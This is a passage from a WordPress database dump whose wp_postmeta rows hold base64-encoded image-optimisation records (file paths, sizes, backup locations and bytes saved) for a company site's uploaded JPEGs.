hcL0Flcm9zcGFjZS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0Flcm9zcGFjZS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTc2NSwiaWQiOjE1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Flcm9zcGFjZS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Flcm9zcGFjZS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0Flcm9zcGFjZS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTc2NywiaWQiOjE1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Flcm9zcGFjZS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Flcm9zcGFjZS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0Flcm9zcGFjZS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTc3MCwiaWQiOjE1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQWVyb3NwYWNlLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQWVyb3NwYWNlLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQWVyb3NwYWNlLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxNzcyLCJpZCI6MTV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BZXJvc3BhY2UtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BZXJvc3BhY2UtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9BZXJvc3BhY2UtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTE3NzQsImlkIjoxNX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Flcm9zcGFjZS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Flcm9zcGFjZS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0Flcm9zcGFjZS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTc3NywiaWQiOjE1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQWVyb3NwYWNlLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQWVyb3NwYWNlLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQWVyb3NwYWNlLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxNzc5LCJpZCI6MTV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BZXJvc3BhY2UtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BZXJvc3BhY2UtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9BZXJvc3BhY2UtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTE3ODIsImlkIjoxNX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Flcm9zcGFjZS02MDB4NjAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Flcm9zcGFjZS02MDB4NjAwLmpwZyIsIndpZHRoIjoiNjAwIiwiaGVpZ2h0IjoiNjAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0Flcm9zcGFjZS02MDB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTc4NSwiaWQiOjE1fV0='); 
INSERT INTO `wp_postmeta` VALUES (30451, 14, 'wpfc_optimisation_reduction', '27240'); 
INSERT INTO `wp_postmeta` VALUES (30452, 14, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0zLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0zLmpwZyIsIndpZHRoIjozNzA0LCJoZWlnaHQiOjM3MDQsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1OTE3OTAsImlkIjoiMTQifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMy0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tMy0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NjExLCJ0aW1lIjoxNDgzNTkxNzkzLCJpZCI6MTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0zLTgwMHg4MDAuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo4MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0zLTgwMHg4MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy0zLTgwMHg4MDAuanBnIiwicmVkdWN0aW9uIjoyNzU4LCJ0aW1lIjoxNDgzNTkxNzk3LCJpZCI6MTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0zLTc2OHg3NjguanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo3NjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0zLTc2OHg3NjguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy0zLTc2OHg3NjguanBnIiwicmVkdWN0aW9uIjoyNTExLCJ0aW1lIjoxNDgzNTkxODAwLCJpZCI6MTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0zLTE2MDB4MTYwMC5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxNjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMy0xNjAweDE2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy0zLTE2MDB4MTYwMC5qcGciLCJyZWR1Y3Rpb24iOjE0NTcxLCJ0aW1lIjoxNDgzNTkxODA1LCJpZCI6MTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0zLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0zLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy0zLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1MDYsInRpbWUiOjE0ODM1OTE4MDgsImlkIjoxNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTMtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTMtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQzOCwidGltZSI6MTQ4MzU5MTgxMSwiaWQiOjE0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMy0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tMy0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDc3LCJ0aW1lIjoxNDgzNTkxODE1LCJpZCI6MTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0zLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0zLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy0zLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxNDE0LCJ0aW1lIjoxNDgzNTkxODE4LCJpZCI6MTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTMtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTMtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTMtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjQwNSwidGltZSI6MTQ4MzU5MTgyMSwiaWQiOjE0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0zLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0zLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy0zLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo0NTksInRpbWUiOjE0ODM1OTE4MjUsImlkIjoxNH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMy0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMy0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tMy0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTE0LCJ0aW1lIjoxNDgzNTkxODI4LCJpZCI6MTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTMtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTMtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTMtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjU2OCwidGltZSI6MTQ4MzU5MTgzMiwiaWQiOjE0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0zLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0zLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy0zLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjo2OTQsInRpbWUiOjE0ODM1OTE4MzUsImlkIjoxNH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMy02MDB4NjAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMy02MDB4NjAwLmpwZyIsIndpZHRoIjoiNjAwIiwiaGVpZ2h0IjoiNjAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tMy02MDB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTMxNCwidGltZSI6MTQ4MzU5MTgzOSwiaWQiOjE0fV0='); 
INSERT INTO `wp_postmeta` VALUES (30453, 13, 'wpfc_optimisation_reduction', '1209349'); 
INSERT INTO `wp_postmeta` VALUES (30454, 13, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0yLTEuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTItMS5qcGciLCJ3aWR0aCI6NTkwNSwiaGVpZ2h0Ijo1OTA1LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy0yLTEuanBnIiwicmVkdWN0aW9uIjoxMjA5MzM1LCJ0aW1lIjoxNDgzNTkxODUxLCJpZCI6IjEzIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTItMS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMi0xLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy0yLTEtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTE4NTQsImlkIjoxM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTItMS04MDB4ODAwLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6ODAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMi0xLTgwMHg4MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy0yLTEtODAweDgwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTE4NTgsImlkIjoxM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTItMS03Njh4NzY4LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NzY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMi0xLTc2OHg3NjguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy0yLTEtNzY4eDc2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTE4NjIsImlkIjoxM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTItMS0xNjAweDE2MDAuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTItMS0xNjAweDE2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy0yLTEtMTYwMHgxNjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTg2NywiaWQiOjEzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMi0xLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24